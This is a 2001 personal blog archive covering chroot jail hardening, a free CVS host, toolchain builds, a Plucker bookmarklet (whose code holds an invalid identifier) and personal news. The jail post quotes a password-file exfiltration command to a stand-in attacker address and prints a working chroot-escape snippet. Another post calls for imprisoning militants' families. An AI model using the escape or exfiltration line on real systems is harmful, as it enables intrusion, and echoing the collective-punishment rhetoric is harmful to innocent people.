Archive for June, 2001

jails, chroots and other account lockdowns

Tags:

Thu Jun 28 00:18:49 PDT 2001

jailed()

    There’s quite a lot to consider when locking down a system for anonymous public consumption. Mind-numbing. I spent a good portion of tonight testing many of my own hacks on my system here, and found that some still work. EEP! Basically there are four ways to run processes on any given machine:

    1. [as root/full]: Processes running as root with access to the entire filesystem end up being the first target of rootkits. Compromising a service running this way could allow the attacker to replace binaries, such as /bin/ps and /bin/netstat, open privileged network ports, and read any file on the system, including a shadowed password file. At worst, they have the capacity for complete damage (rm -Rf /). Sendmail is an example of one daemon which runs in this state.
    2. [as root/jailed]: A typical rootkit would probably fail to operate, because they typically require a shell (/bin/sh) and basic commands such as /bin/rm and /bin/cp. A process in this state can break from a jail. Given that the process is running as root, the attacker could use an exploit to execute code which makes system calls to perform root activities (referencing inodes outside the jail). Though a bit safer than [1], in the context of a scripted attack, this state does not provide the strongest defense.
    3. [non-root/full]: The threat for a full system compromise is reduced slightly from [1] in that the attacker will not immediately have root permissions. However, any process in this state can execute all the standard commands and shells, and thus allow the attacker to explore the filesystem in search of
      root-level exploits. Also, most configuration files and information about the system are available to this process, so an attacker can garner further information about the system (‘mail attacker@domain.com < /etc/passwd‘).

    4. [non-root/jailed]: This scenario has the most restrictions upon the running process. Because the jail should only contain enough information to support the service, a compromised service would give them no opportunity to execute shells or common commands or to explore system information. Also, the extent of damage posed by file deletion is limited to directories within the jail. The greatest danger in this category is if an attacker can place binaries or files (in the jail) that will be accessed from outside the jail by other processes. In this case, it is possible for exploits to spread. Postfix is a daemon which runs in this context. Monitoring jails becomes extremely important here.

    I’ve designed a completely new way of handling this situation in my sandbox system here, one which I’ve never seen implemented or discussed before (I must thank all this Embedded Linux work for giving me the idea, and the guys in #perl on Efnet for helping me squeeze some of the last bugs out of the theory — no, it is not implemented in Perl, but trying to get something as spindly as Perl installed in the jail, and remain functional, presented quite a challenge).

    So far, in my testing, I have not been able to break through it. I have an edge, though, I know the technology used to implement it, which lets me know how to try to exploit it. Normal users on the server would not know this, or be able to find it out from their own vantage point.

    “…Nothing is secure. Only secured…”

    Creating a full file system inside a chroot() jail can involve several things, including hardlinks [bad, potentially insecure, doesn’t cross filesystem boundaries], symlinks [ug, needs no explanation],
    or statically compiled binaries [definitely not ideal for a server potentially holding hundreds of user accounts].

    What I’ve managed to do, is provide a fully-working, non-crippled file system with intact shared binaries and libraries, including perl and python and friends, inside the jail, read-only, in a way which is reproducible, secure, and not crippled.

    At this point, we have a fully-functional shell account, with all services read-only (using my new design), and the user themselves gets a nice large chunk of quota’d space under their account from which they can use for web, code builds, whatever (process-limited, and using idled, of course. There are ways around it, but that’s already been taken care of on my end).

ObJailHack

    int fd = open("/", O_RDONLY);
    mkdir("testdir");
    chroot("testdir");
    fchdir(fd);
    for (int i=0; i<10; i++) {
            chdir("..");
    }
    chroot(".");
    execl("/bin/sh", "/bin/sh", NULL);
    

    I’ll let the others figure out what this fixes.

So much more to go, but I’m learning quite a bit of theory and technology I never knew before. I’ll keep posting my findings as I go through them. Perhaps others can take advantage of some of this on their own systems. The next step is to start locking down every service and daemon on the box so that they too run in
mode [3] or mode [4] above. Something similar to:

#include <stdio.h>
#include <stdlib.h>

main(argc, argv) {
        int gidlist[] = { 505 };
        chroot("/usr/chroot/MyDaemon");
        chdir("/");
        setgid(505);
        setgroups(1, gidlist);  // or initgroups()
        setuid(505);
        
        execl("/bin/MyDaemon",
                "/bin/MyDaemon", NULL);
}

You get the idea. More later.

Locking down users, SourceFubar.Net and the Embedded Linux course I’m writing

Cellblock 3, LOCKDOWN!

In the process of relocating my server and network from CT to CA, I have done some major cleanups on the mirror. It’s running a hardened Debian build now, and is tighter than a drum.

I have been successful in implenting a quota on chrooted ssh shells (yes, I’ll certainly document this and post a link when I’m done), and locked them down pretty tightly. What is this for? I am now expanding my services and opening up the cvs to the general public community. The server can now be used as a public cvs, web, database, development platform for anyone who has an open source project and wants to house it there.

Currently there are about a dozen public projects in the cvs and about a dozen others not public in there also.

…and because of these changes, now we can offer…

A Free Public CVS Server and Development Environment

I have put up a container page as a placeholder until the new domains come rolling in and get pointed to the new box (a million thanks go to rasmus for allowing me temporarily host it on his connection until I can find a provider here in CA.)

What’s “different” than other similar services?

  • No banners. Period. You will not ever see banners on this site at all, or any of the pages linked from it. We do not need to “…generate sustaining revenue…” to run this service or to keep it running.
  • High-quality tools. ViewCVS (highly customized), Mailman (mailing list management), Mantis (bug tracking), IRC services (localized and secured, in case your team needs a secure channel), provided for you and your team, all for free, as well as dozens of other tools to make your development tasks easier.
  • Absolutely secure (as can be). The machine is secured, the services are secured, and everything is logged and monitored. There will be no unexpected compromises or exploits executed on the box.
  • No SPAM emails. We don’t put up with SPAM, and neither should you. Your email address will not be used for “newsletters” or any other unsolicited dreck.
  • No clutter. Our design is simple, not confusing. Your development will not be burdoned by our tools, our website, or our facilities.

When we say free, we mean free, not free with “…fine print…” I’m open to suggestions of other tools and services we can provide, so if you have ideas or have a project you wish to host, please feel free to email me

Embedded Linux

The course is plodding along slowly. I’ve been delayed a bit by some cross-compiler mess, but I managed to squeak out a one-pass script to handle it all for me (or others) fairly painlessly. Now I’m back on track with writing chapters again. Lots of
things I’ve never done before in this course, so it’s a learning exercise as well as trial and error with my own skillset. Fun, but very high-octane on the deadlines.

Life’s been busy, but it’s moving along fast. Birthday comes up in about 2 weeks, turning The Big Three-OH.
Somehow I don’t feel any different. Am I supposed to?

cross-gcc toolchain build was a success!

Tags: ,

VICTORY!

I have now tamed the 8-headed hydra of a beast which calls itself cross-gcc. After beating my head against the wall tracking down bugs deep into the guts and bowels of gcc and glibc, I figured it all out.

In the spirit of open source (“Release Early, Release Often”), I’ve whipped up a single-pass-build-script to make this all incredibly easy for anyone else to take advantage of.

Seems that every VA box I’m aware of (and many Andover boxes also) is/are down, except SourceForge. I would have personally preferred the opposite, but hey, that’s just my opinion (these include themes.org, linux.com, slashdot.org, newsforge.net, linuxgram.com, andover.net, OSDN.com and others).
Some people believe it has to do with VA’s recent financial troubles.

Personally, I don’t get into the politics of any of this, but here’s the official Quit Slashdot.org Today page for those who want a laugh.

I just tried to do a whois on each of these servers and noticed some interesting things:

# date
Sun Jun 24 05:41:54 EDT 2001

# whois slashdot.org
[whois.internic.net]
Whois Server Version 1.3
SLASHDOT.ORG.SUCKS.COMPARED.TO.JIMPHILLIPS.ORG
SLASHDOT.ORG

# whois linux.com
[whois.internic.net]
Whois Server Version 1.3
LINUX.COM.NEEDS.TO.RUN.FREEBSD.LIKE.HCCTRC.COM
LINUX.COM.IS.KINDA.COOL.BUT.RUN.FREEBSD.LIKE.JIMPHILLIPS.ORG
LINUX.COM.ALONETRIO.WAS.HERE.WITH.ALTAVISTWAP.COM
LINUX.COM

My current bet’s on more hacking going on. Nobody asked me to investigate this one though.

I ordered DSL finally, and will end up paying way too much for it. $99.00/month for 144k/144k of IDSL, not even real DSL. It’s all there is here, but that beats the 14.4k dialup performance I’ve been getting lately.

URGENT

      1. I need to find someone in the Bay Area with a decent solid network connection to allow me to colocate a box on their segment for a few weeks until I can find another colocation provider out here. Mine just folded and is giving me until the second week of July to get my box out and all DNS records routed off (about 20 domains). Does anyone want to earn an extra $100/month or so to let a box sit under a table on
      1. their LAN segment for a few weeks? The box supports open source project development and some other domains, nothing heavy-hit at all, nothing illegal, just web, mysql, cvs, ssh.

HELP!

“..there’s still more left to this weekend, isn’t there?…”

Oops! Uncommit!

Note to self…

    OOPS!

    Tue, 19 Jun 2001 09:31:24 -0700 (PDT)

    Never do a major revision release at 03:06am PDT again. I rerolled the packages, and replaced them. We caught two bugs early enough not to require a increment in the version numbering.

Code or RSI, that is the question

Tue Jun 19 03:11:55 PDT 2001

WHEW!

pilot-link 0.9.5 released!

My hands hurt

Spent all day trying to get gcc/binutils/gdb and friends compiled on both x86 and SunOS on an E3500 machine as a cross-compiler for ARM as a lab for this Embedded Linux Course.

I don’t know (or remember) SunOS as much as I probably should, much fumbling around was had (over 14.4k dialup no less). Thanks go to mkp for bailing me out here and there. He’s not off the hook yet though. The guys in #solaris on Efnet were helpful also.

Now to decide if I want to drop some caffeine and stay up all night (or at least for the next consecutive 15 hours or so) and work on this course, or if I should just crash, and let biology wake me up.

What a week so far. Unbelievably productive.

The Wonderful World of Javascript

Tags: ,

Sun Jun 17 19:04:32 PDT 2001

The Wonderful World of Javascript

I started thinking about a way to take a visible page in a browser, and configure some Plucker parameters on that page, and then have it gathered for you, or have the values build a home.html file for you, so you can Pluck that page at your next frequency.

I’ve never done Javascript programming before (can I really call it that?), but here’s what I have so far after about 2 hours of tinkering (it’s a Javascript “popup” wizard walkthrough sort of thing), which will prompt for the URL (it snarfs it from the current page), an expiration time on the cookie (defaults to 1 day), and then the maxdepth of that URL, and sets two local cookies for those values. When it’s all working (or I hit the string length limit on bookmark Location fields), it will walk the user through the full
gamut of settings for that URL.

javascript:q7Hm8=prompt('This webpage has ' + document.links.length + ' links. 
Below is the URL of the current webpage. We can now store this value in a 
 local cookie on your machine. Once your selected Plucker parameters are set, 
we can then create a home.html file for you with these parameters. ',location.href); 

if(q7Hm8!=null) {
        // Prompt for two separate vals
        // which will be stored in two
        // cookies on the local machine
        pVj5D=86400000*prompt('Expires in...(days)','1');
        m3xD=prompt('How deep would you like to gather' +
             location.href,'1');

        // Prompt for the maxdepth value here
        1m4g3s=prompt('How deep would you like to gather' +
               location.href,'1');
        dT9v=new Date;dT9v.setTime(dT9v.getTime()+pVj5D);

        // Store the first cookie (URL)
        void(document.cookie='PluckerURL='+escape(q7Hm8)+';
        expires='+dT9v.toGMTString());

        // Store the second cookie (maxdepth)
        void(document.cookie='PluckerMaxdepth=
            '+escape(m3xD)+';
        expires='+dT9v.toGMTString());}else{void(null)
}

So far, this works, and properly sets the cookies. Why do I want to do this in a Javascript fashion? because my goal
here is to make a Plucker “bookmarklet” that most users can use to ease their pain of Plucker configuration
and sync’ing.

An example of how it can be used (for this current page) is here

Reading the cookies back is a bit simpler. I won’t bore you with the code, but it allows me to do some interesting things with it. The problem with Javascript is that I can’t launch a local client application (plucker-build in this example, which is used to actually gather the content itself), nor can I write to a local configuration file. I can, however, put the data in a popup browser window, and have the user do a SaveAs from the menu on that window. It’s not the best solution, but short of having to write several different plugins for each architecture, it will work for the moment.

I’m still trying to find out if Javascript has checkbox and <option select…> type of elements so I can make a real application out of this, in a client-side popup dialog “wizard” thingy.

Why am I not doing this fully in a webpage-style application? Because then you lose focus of the webpage you’re on that you want to Pluck, and this must run client-side. I suppose I could make a webpage that contained similar code, and then submitted the URL to my server for final parsing and gathering, but my server doesn’t have the bandwidth for that right now.

This all started from my original search
google
bookmarklet. You can click on it and it will pop up an entry dialog, or you can highlight words on the webpage, and click on it (go ahead, try it) and it will send that highlighted text to google as the search criteria.

I started playing a bit, and came up with another weird one to translate
the current webpage into German
(or any other language)

Mantis

The bugtracker is up. Currently supports Plucker, pilot-link, pilot-mailsync, POSE, and a few other projects. I made some cosmetic changes to the layout, and cleaned up some of the PHP code. I’m trying to learn the language, but it’s slow going. Worked for a year with rasmus, and didn’t even use the language once for anything production. EEP!

As the Task List Turns… (unordered)

  • Embedded Linux Course, tightening deadlines, scope creep.
  • Plucker Bookmark Assistant needs a version update and will begin handling IE as well as Netscape and Mozilla bookmarks. I don’t know what format Konqueror uses, or some of the other browsers, but I can support them too, in time. I found URI::Bookmark which may help a bit.
  • The Plucker Perl Spider needs a revisit, and an update. Hasn’t been touched in 11 months. EEP! I have all new ideas for it.
  • pilot-link 0.9.5 needs to be released. I wish we could get the final parts of that Ralf’s USB sync fixes pushed in.
  • Update the main gnu-designs webpage. I have a new design idea here that I’m tinkering with.
  • Chest x-ray.
  • …buncha other things…

It’s been a busy Sunday. This week promises to be incredibly productive for me. I still have to be cranking basically 26 pages a day out of this Embedded Linux Course.

My hands hurt.

Open Source is not a pool of free development hours, beheadings and other goop

Wed Jun 13 00:06:18 PDT 2001

fejj, I totally agree. If/when I get spare carbon cycles, I can try to help out (and I have both UI experience as well as development experience). Shouldn’t be too hard. My plate is pretty full through a good portion of this year though.

What irks me the most is that people ask us (as developers and maintainers) to fix this, fix that, add this, add that. What they fail to realize is that we are not always here to just provide for them. Many of us write software because it fills a hole in what we already do, or we want to make what we do easier. We are not an open software conglomerate to keep feeding “requests” into. If something doesn’t work the way you want it to, and the author or maintainer doesn’t seem to want to add that feature, add it yourself and submit a patch, or create your own version. You have the source. Whining about it only makes noise, and noise is distracting.

Open Source is not a pool of free development hours for people to just abuse. People who don’t want to contribute, get muted to the bottom of the pile.

 

Beheadings

Since when did we live in a world where we chop the heads off of innocent people, because the government in another country isn’t listening to the demands of a rebel guerrilla group?

Sabaya said they beheaded the American:“..because the Philippine government is toying with us..”

On arrival of U.S. troops for joint exercises in the Philippines: Sabaya: “Welcome to the party. If the U.S. troops come here, they’re the ones we want to fight.”

On any U.S. assistance in the hostage crisis:Sabaya: We’re raring to fight. We want to fight with the U.S.. Tell them to reinforce their troops, if they want. Maybe they think we’ll be frightened. Well, all I can say is it’s up to the government. They think that they can beat us in a gun battle. They think we will bend. We would relish dying than surrendering to them. Remember.

Two people confirmed beheaded, one of them a volunteer negotiator for the rebel group. The third person was an American, a tourist, who had nothing to do with the conflict at hand. His body has not been found yet.IMHO, like the Philippine government, we should have a zero tolerance policy as well with these people. You kill an American, we destroy your military base, we strangle your finances, destroy your military facilities, and imprison the families, friends, supporters, and funding parties of your campaign.

You’re not afraid to die, good.. BANG, you’re dead. Anyone else?

Now where did I put that extra clip and that application to become a mercenary again…

Other Goop

Made some favicon.ico files for my cvs page, the Plucker homepage, our main page, and the pilot-link homepage. That should stop those annoying emails I get every hour by the dozens when these files aren’t found.

The server was down for 19 hours. Lightning storm took out the power. Need to relocate that network to California.Started converting all of my HTML pages over, customer and otherwise, into XHTML 1.0 validated content. Satisfying, but tedious.

Birthday coming up in a month. Might want to treat myself to some more inkwork on that right sleeve.

USB synchronization with the m50x Palm devices is almost working. That’s the last thing left holding up the pilot-link release… Then it’s on to the XML path, and gutting the architecture and codebase quite a lot… fun fun. I might have to prod dyork and some of the other XML and XSLT/DTD gurus here sometime soon for some databits on this.

Working on an internal Secret Project #209

Still working on the Embedded Linux CourseI think a vacation is looming on the very near horizon. Something very far away, please.

12 Monkeys

Mon Jun 11 23:59:40 PDT 2001

12 Monkeys

Er, I mean domains.

Seems there was yet another bad thunderstorm on the east coast tonight, where my network is co-located. My provider’s provider apparently is down; pings stop short of the outside edge router. 12 domains down, and about 50 separate sites under non-vanity domains, also down. No response since 18:59:16 PDT. Don’t know how long they’ll be down. I hope it wasn’t (another) equipment failure on their end.

Does anyone know of a good, reliable, fairly-cheap co-location facility in the Bay Area, or some kind-hearted person in the Bay Area with a T1 in their house want to make some monthly cash on the side? email me with details

Visceral Time Management

Sun Jun 10 17:48:52 PDT 2001

Random Tasks

  • Hacking maildir support into pine. My mailboxes are now getting too large and unwieldy, even using xfs, reiser, or ext3. I will not use mutt. I’ve tried it, spent several hours getting the look and feel and colors identical to pine, including every single keystroke pine uses, but I feel it’s still not nearly as powerful as pine for me.
  • Updated my CVS webpage. It needs a bit more on it, but at least the links are accurate, and the information corrected. I will embellish on it soon. It laid dormant for over a year on that site.
  • Hungry.

Visceral Time Management

I have these two full-height walk-in closets in my apartment, each with two sliding mirror doors on them. I’ve filled the top half of one of them with Post-It notes of each task I have on my plate. Every day I walk past it, they are right in my face. I try to make an attempt at taking one of them down a day. So far, it’s been somewhat successful, but more have taken up the empty spaces.

Mountain YIKES!

Sun Jun 10 01:52:37 PDT 2001

Mountain YIKES!

deekayen, good choice ditching the RapidFire shifters. I’ve never run them, and never will. I’ve heard too many problems with them. For trail riding, it’s probably fine. Once you get sand and grit into the nested discs which stop the detents from working properly, misfire-city. Useless. Also, if you drop the bike while riding, your chances of breaking off the shifters themselves are very high. I have GripShift, and I love them. Dialed in perfect, never missed a shift, even when I used to run a Shimano 600 Ultegra road dérailleur on my older mountain bike (the best dérailleur I’ve ever run on a mountain bike, hands-down, is that 600 Ultegra road dérailleur).

Wait until you start doing 2′ and 3′ hops, using small protruding roots and rocks as a launching point. I preload the shock (drop my weight down, 165lbs.), then as it releases, pull up on the clipless pedals, bam! 2-3′ air. Clipless pedals definitely help, and road shoes, none of those soft, squishy off-road shoes for me. Maximum power to the pedals, please.

I have a Trek Y-22 from 1999, and just about the only thing original on it is the frame, rear shock, and front fork. I’ve replaced everything else because I’ve either broken it, or worn it out. I love doing drops, jumps, pretty aggressive singletrack, anything hardcore. I’m on it.

Before moving to California, I dropped some coin on these sweet Race Face cranks and Shimano XTR brakes. I was noticing some “sway” in my bottom bracket when I hammered, and thought it was the frame giving out. I plopped these babies on, rock solid ride again. I gained so much power back in my stroke. I spent the extra dollars and special-ordered the nickel-plated rings to go with it and the linkless chain.

Next thing I replace is the fork. I’m looking into some more carbon parts too, but I’m not yet sold on the carbon seat-posts and handlebars yet. I’ve got GripShift, ESP9 carbon derailleurs, and a nice clamped-down set of Deore-XTR brakes front and rear. Sweet setup, shifting is imperceptibly silent, braking is hard and responsive (not squishy).

I have to think about purchasing another road bike for myself (lost my Specialized Cirrus (not a picture of my bike, but the same bike I had) custom when I moved out of “psycho’s” house in CT). I used to love that bike, and put a solid 40 miles a day, every day, for 3 years on that sucker. I have to think about getting another road bike for myself and get a bike for Erika. Not sure if she wants a road or a mountain bike yet. We’ll have to field-test her on that.

Anyone know of some good hardcore rides in the Bay Area? (Marin, South City, San Bruno) Is there a riding club or anything like that out here?

Jim Henry

In other biking news, I see an old friend of mine, Jim Henry is still going strong | these days, beating able-bodied riders, even though he has only one arm to ride with (He’s on the far right here). He was always an inspiration when I used to ride with him (or when he’d pass me during a long ride). One thing I’ll always remember him saying to me was:

“…hills are nothing more than flats, at an angle…”

…as he sped past me up a hill, and I was huffing to keep up. An amazingly positive person, despite his handicap. Keep pumping, Jim!

Swordfish

I just got back from seeing Swordfish at the local cinema. It was packed, and I mean no more than 5 empty seats left in the place. I just have to point out three things that caught my attention in the first 10 minutes:

“..Axel Torvalds..”

“..number one hacker..”

“..finnish consulate..”

Come on now, that’s just a little TOO lame.

At least they spat out some of the buzzwords I’M used to hearing, ipchains, portmap, sniffer, DS3. Some of it was entertaining, and very Matrix-esque (and in fact, Joel Silver produced both the Matrix and Swordfish), but it had that “Tarantino” feel to it. Interesting plot, “mostly” technically accurate (no uploading a trojan to the mothership with zmodem on a PowerBook from within a stolen alient craft here (ala Independence Day), folks). It’s probably worth the $8.00 or so.

Ok, back to more CVS hackery…the weekend isn’t over yet!

Bad Behavior has blocked 1733 access attempts in the last 7 days.